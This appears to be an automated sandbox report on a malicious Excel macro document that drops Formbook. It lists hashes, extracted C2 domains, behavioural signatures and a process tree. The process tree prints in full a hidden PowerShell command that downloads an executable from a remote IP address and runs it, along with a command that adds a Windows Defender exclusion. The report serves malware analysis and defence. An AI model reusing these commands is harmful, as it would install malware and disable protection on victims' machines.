Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 08:22
Behavioral task
behavioral1
Sample
SOA_PO#8829921199.xlsm
Resource
win7-20240903-en
General
-
Target
SOA_PO#8829921199.xlsm
-
Size
165KB
-
MD5
c0a096ce5928bce34fffd5874093f235
-
SHA1
971a8fbd841e42dcab84288205525b89301825c2
-
SHA256
54929de588e37191bfc6dd0bf4f3edc1fca58c67af0e6bc7b1bd15a66d8c1bf0
-
SHA512
9d7c5aaf2fe546422ff3379169909929ec50f6eebba27d527178066c943ea2973a72c7501202b9502c8ccd646dfe6b49c1194c34b8f9822404bf1fad6971eb61
-
SSDEEP
3072:BJNjJehd8PiRjkctohQQRBK0BvyixmZ49ke+jJLNkYa6+Rc64d:BJN06iactuRbB6M9+1GYaza64d
Malware Config
Extracted
formbook
4.1
t20u
ecurity-jobs-ne-00989.bond
ameuniverse.shop
sychologist-therapy-33393.bond
refabricated-homes-33099.bond
urltheswirl.live
reengroce.online
cknowledgewizardinter14.sbs
excasino.club
931.bet
ilehog.net
olorandbrush.net
jpbbmr.biz
vtwenty20pt.top
nline-advertising-76521.bond
eavenresidence.net
arodyna.shop
orsi-di-massaggio.bond
est-kids-toys-near-me.today
47-nurse-76671.bond
u-suppr.top
onstruction-jobs-49170.bond
yewxop.xyz
ruisjob.today
nlinecourses92.today
91599.club
oluoav.xyz
ashiono.shop
panish-classes-65082.bond
uikfox.buzz
adoggeriacamadepiedra.online
nvestment-services-64552.bond
8s6wj.digital
exy-baccarat66.net
itchenremodelingideas.online
risis-tech.net
enior-dating-24515.bond
epatitis-treatment-85780.bond
etrition.shop
iautomationmarket.net
nfluencer-marketing-41712.bond
eststock.website
amphunt.online
enddid.shop
rogramddd.shop
5g2q9.buzz
aconstructionjob.bond
asedzos.fun
aktikkvtoto04.info
entley-paaae.buzz
d36d.shop
tatikkdb.app
eedsunited.live
fzf.xxx
hrcbmggvm.top
-web-apple02.buzz
ibotech.net
ackrelaxer.shop
ggdonor-bd-en-fb-va.today
400725ieulrju709.top
ind-one-bedroom-apartment.today
addiehub.zone
hairulaming.asia
eirobox.online
ofs2is5ap.buzz
twow.shop
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4312 1468 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2708 1468 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4564 1468 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2892 1468 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3244 1468 powershell.exe 83 -
Formbook payload 3 IoCs
resource yara_rule behavioral2/memory/5044-87-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3284-134-0x00000000002D0000-0x00000000002FF000-memory.dmp formbook behavioral2/memory/4168-221-0x0000000000400000-0x000000000042F000-memory.dmp formbook -
Blocklisted process makes network request 5 IoCs
flow pid Process 56 4312 powershell.exe 58 2708 powershell.exe 59 4564 powershell.exe 60 2892 powershell.exe 62 3244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2188 powershell.exe 912 powershell.exe 1852 powershell.exe 4312 powershell.exe 2708 powershell.exe 4564 powershell.exe 2892 powershell.exe 3244 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe -
Executes dropped EXE 8 IoCs
pid Process 3328 gvpttllrilhpexthxdz.exe 4864 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 4556 gvpttllrilhpexthxdz.exe 3696 gvpttllrilhpexthxdz.exe 3056 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 1464 gvpttllrilhpexthxdz.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3328 set thread context of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 5044 set thread context of 3488 5044 gvpttllrilhpexthxdz.exe 56 PID 4864 set thread context of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 3696 set thread context of 3488 3696 gvpttllrilhpexthxdz.exe 56 PID 3284 set thread context of 3488 3284 control.exe 56 PID 4556 set thread context of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4168 set thread context of 3488 4168 gvpttllrilhpexthxdz.exe 56 PID 4168 set thread context of 3488 4168 gvpttllrilhpexthxdz.exe 56 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language control.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 840 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 4312 powershell.exe 4312 powershell.exe 2708 powershell.exe 2708 powershell.exe 5044 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 2188 powershell.exe 2188 powershell.exe 3284 control.exe 3284 control.exe 3284 control.exe 3284 control.exe 4564 powershell.exe 4564 powershell.exe 3696 gvpttllrilhpexthxdz.exe 3696 gvpttllrilhpexthxdz.exe 3696 gvpttllrilhpexthxdz.exe 3696 gvpttllrilhpexthxdz.exe 912 powershell.exe 912 powershell.exe 3980 wscript.exe 3980 wscript.exe 3284 control.exe 3284 control.exe 2892 powershell.exe 3284 control.exe 3284 control.exe 2892 powershell.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 1852 powershell.exe 1852 powershell.exe 3284 control.exe 3284 control.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 3284 control.exe 3284 control.exe 3244 powershell.exe 3244 powershell.exe 3704 wlanext.exe 3704 wlanext.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
pid Process 5044 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 5044 gvpttllrilhpexthxdz.exe 3284 control.exe 3696 gvpttllrilhpexthxdz.exe 3284 control.exe 3696 gvpttllrilhpexthxdz.exe 3696 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe 4168 gvpttllrilhpexthxdz.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 5044 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 3284 control.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 4564 powershell.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 3696 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 3980 wscript.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 2892 powershell.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeDebugPrivilege 4168 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE Token: SeShutdownPrivilege 3488 Explorer.EXE Token: SeCreatePagefilePrivilege 3488 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 840 EXCEL.EXE 840 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3488 Explorer.EXE -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 840 wrote to memory of 1340 840 EXCEL.EXE 84 PID 840 wrote to memory of 1340 840 EXCEL.EXE 84 PID 4312 wrote to memory of 3328 4312 powershell.exe 100 PID 4312 wrote to memory of 3328 4312 powershell.exe 100 PID 4312 wrote to memory of 3328 4312 powershell.exe 100 PID 2708 wrote to memory of 4864 2708 powershell.exe 103 PID 2708 wrote to memory of 4864 2708 powershell.exe 103 PID 2708 wrote to memory of 4864 2708 powershell.exe 103 PID 3328 wrote to memory of 2188 3328 gvpttllrilhpexthxdz.exe 104 PID 3328 wrote to memory of 2188 3328 gvpttllrilhpexthxdz.exe 104 PID 3328 wrote to memory of 2188 3328 gvpttllrilhpexthxdz.exe 104 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3328 wrote to memory of 5044 3328 gvpttllrilhpexthxdz.exe 106 PID 3488 wrote to memory of 3284 3488 Explorer.EXE 107 PID 3488 wrote to memory of 3284 3488 Explorer.EXE 107 PID 3488 wrote to memory of 3284 3488 Explorer.EXE 107 PID 3284 wrote to memory of 3156 3284 control.exe 108 PID 3284 wrote to memory of 3156 3284 control.exe 108 PID 3284 wrote to memory of 3156 3284 control.exe 108 PID 4564 wrote to memory of 4556 4564 powershell.exe 112 PID 4564 wrote to memory of 4556 4564 powershell.exe 112 PID 4564 wrote to memory of 4556 4564 powershell.exe 112 PID 4864 wrote to memory of 912 4864 gvpttllrilhpexthxdz.exe 113 PID 4864 wrote to memory of 912 4864 gvpttllrilhpexthxdz.exe 113 PID 4864 wrote to memory of 912 4864 gvpttllrilhpexthxdz.exe 113 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 4864 wrote to memory of 3696 4864 gvpttllrilhpexthxdz.exe 115 PID 3488 wrote to memory of 3980 3488 Explorer.EXE 116 PID 3488 wrote to memory of 3980 3488 Explorer.EXE 116 PID 3488 wrote to memory of 3980 3488 Explorer.EXE 116 PID 2892 wrote to memory of 3056 2892 powershell.exe 119 PID 2892 wrote to memory of 3056 2892 powershell.exe 119 PID 2892 wrote to memory of 3056 2892 powershell.exe 119 PID 4556 wrote to memory of 1852 4556 gvpttllrilhpexthxdz.exe 120 PID 4556 wrote to memory of 1852 4556 gvpttllrilhpexthxdz.exe 120 PID 4556 wrote to memory of 1852 4556 gvpttllrilhpexthxdz.exe 120 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 4556 wrote to memory of 4168 4556 gvpttllrilhpexthxdz.exe 122 PID 3488 wrote to memory of 3704 3488 Explorer.EXE 123 PID 3488 wrote to memory of 3704 3488 Explorer.EXE 123 PID 3488 wrote to memory of 3704 3488 Explorer.EXE 123 PID 3244 wrote to memory of 1464 3244 powershell.exe 126 PID 3244 wrote to memory of 1464 3244 powershell.exe 126 PID 3244 wrote to memory of 1464 3244 powershell.exe 126
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA_PO#8829921199.xlsm"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵PID:1340
-
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3704
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:1616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1464
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD58ec831f3e3a3f77e4a7b9cd32b48384c
SHA1d83f09fd87c5bd86e045873c231c14836e76a05c
SHA2567667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA51226bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD5d885ff0a315aff2824ba7bf4cbc482a5
SHA1bc3a1551c5d5a884218efcd927192b53d6bf926d
SHA256d09042154696756eb7337d32b752b3c8613f05a1691cc721594b6eb3dae66121
SHA51291cc40bc645d332134547077d3f22dacb6958e830d2cc5127d4d258a0f7c80ed096f46dfe4cb1ec06a2c5f77112c494d620ff94ac085e6fe34f18f78be15c902
-
Filesize
18KB
MD5d70045f69f3e495d73e07c2d3304934d
SHA171b0acbe5991a8297d1823471622e138afec00d6
SHA256eb53c1fdb2e99061a4ec5bca4b1cffd3599679139a804f302e80695722ec8524
SHA5126652eea2320e6d1dc51cca5a9f6a21b549f268478e1aa1e91c696846b7ad3e70c6463a203a62f7336dda5dbf62737f19d519f9d08cd7396d4237415dcbeef675
-
Filesize
1KB
MD5fbbe616c6563865d0f776ed058aec2c4
SHA168a910fa8fad4b21e8cdc0c0263dbef6cadcc268
SHA256dd1a56d9f57e412134fb8601e43727e06edde336dba81888c6f79828e6c5c0d7
SHA5126422316dddc9efccb04d1b84f38014e4d565d228f6d7e0e799154ccec8dde7c795270cbb1d37e4a5630f3b61b326cb72771e76ad7dcde0d3e6bfcbe9d8802969
-
Filesize
18KB
MD5c86a3652954cb67c7334341f0374a873
SHA12e4be216ce92ecc23419f6ffc8a47998deaa0b67
SHA2569e6802d9ca2ab699ad6813cd366ba2a5493f2a5a90a1b3b5e1cb24e5988817e3
SHA5129c9446d280f9491d5dfbf560460e735b8de6021ab4b2f2632457404c5f412b2003d25bf74195f4942904102036c5b13958e4cb6b32d88fe7123ada16dca2fc87
-
Filesize
18KB
MD59f3d3c7a642909e3ba01fdeb3b52bf0a
SHA17628cfb36c8555dc5080cc7facb6b5c83a6661c2
SHA256b89a466b6d4ba7aad297f29dfa0e03f193e6ed4211842e7adbee1e896f810cc7
SHA5126e9138160715d32cf236a11bea4bf882299344e6bdf9fe01ef13d7080cbbd1283fc890cf63acf1cdaaae370d042950dcf4bc9dabbea65d0d336e8a789ea8e2a9
-
Filesize
1KB
MD58d80c45e0e047b75073a3d1c2710c68f
SHA1babc73cf30327b36d184239a2747ec94d48929f4
SHA2566859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA5125da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD53d811ee933c0e9b8b1c0bb02ec7f79ee
